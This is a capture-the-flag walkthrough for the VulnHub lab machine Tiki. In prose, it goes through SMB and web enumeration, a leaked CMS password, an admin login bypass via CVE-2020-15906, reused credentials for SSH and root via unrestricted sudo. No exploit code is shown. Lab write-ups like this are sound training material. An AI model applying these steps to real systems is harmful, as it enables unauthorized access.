VulnHub: Tiki

Today we will be looking at an easier box named Tiki that can be downloaded on VulnHub. We will start off with an NMAP scan as usual:

From here we see that SMB is open, looking at it with smbclient -L we can see that we are able to see a share that is not normal, looking deeper into this share we find a note for a user silky:

Looks like we have a CMS password. However, when going to the site we get a default apache page. Let’s do a gobuster scan and see if there is anything that we are missing:

We find a site called Tiki, we can check that out and see if we can login with silky:

That worked! Now we need to enumerate the site, we can use the wiki page on the side, look at last changes and then click on all:

Now click on any one of the wiki pages and then click on history, from here we can compare all of the different versions that have been written by admin:

Clicking through the different versions we finally find the CVE:

It looks like we are looking for a CVE 2020 15906. Searchsploit will not bring anything back, however, we can start to look at Searchsploit and figure this one out just from the date itself. You can also look up the CVE online and see it is for an authentication bypass for admin after 50 login attempts. After these attempts the admin will have a blank password and we will login with Burp Suite as shown below:

We are now in as the admin user. From here you may think upload a PHP reverse shell, I thought the same thing. After about 30 minutes I realized this is not going to work. I decided to start to look around and found some credentials:

We can try to SSH in with silky and the creds that we got:

Now for the privilege escalation, remember always try a sudo -l, especially if you have a password. We can see that this user can run everything as sudo, so a quick sudo su and we are root.

That is it, hopefully you liked the box and thanks for reading.